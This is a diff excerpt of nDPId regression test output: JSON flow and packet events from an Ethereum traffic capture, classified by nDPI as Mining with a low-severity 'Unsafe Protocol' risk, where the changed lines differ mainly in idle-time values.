-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1578508365567,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365567,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcHIoAAEARCbPAqAG4agwnqHZfdn0AiGszdDnl2LgHwUzwnp\/NUaAjl2\/6ukAyoGtKBC9U9NcJJ2SSjY1bIBQONPG3UmfcMXvTBTN6oZMu6GXIBxr9UadDckfonN6CsHl3H7EBI7wV8mnDuf+AbUa\/i02tPDo+DL09AAHdBMuEfwAAAYJ2X4J2X8mEagwnqIJ2fYCEXhYgYQU="} 
00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"} 
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1578508365712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365712,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlo3AqAG4Ti+Tm91hdl8xKZuYAAAAALAC\/\/+26gAAAgQFtAEDAwUBAQgKItiYjAAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365588,"flow_last_seen":1578508365588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365588,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1385,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1578508365588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365588,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGVs\/AqAG4p1Z6Mt1edl9ccbjwAAAAALAC\/\/8vAQAAAgQFtAEDAwUBAQgKItiYGgAAAAAEAgAA"} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365592,"flow_last_seen":1578508365592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365592,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1386,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1578508365592,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365592,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLq7AqAG4VmvzPt1fdl9sf4vVAAAAALAC\/\/8j6AAAAgQFtAEDAwUBAQgKItiYHgAAAAAEAgAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1578508365593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365593,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0AABAADQGeGsj5egTwKgBuHZf3VbzHyaM6OsJA4ASbvDSjgAAAgQFjAEBBAIBAwMH"} 
+00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1578508365593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1578508365593,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGbHfAqAG4I+XoE91Wdl\/o6wkD8x8mjVAQIABiKQAA"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1389,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365295,"flow_last_seen":1578508365594,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":435,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1578508365594,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1578508365619,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365619,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGH3XAqAG4BQFT4t0xdl\/cLTE7AAAAALAC\/\/\/\/rwAAAgQFtAEDAwUBAQgKItiYNwAAAAAEAgAA"} 
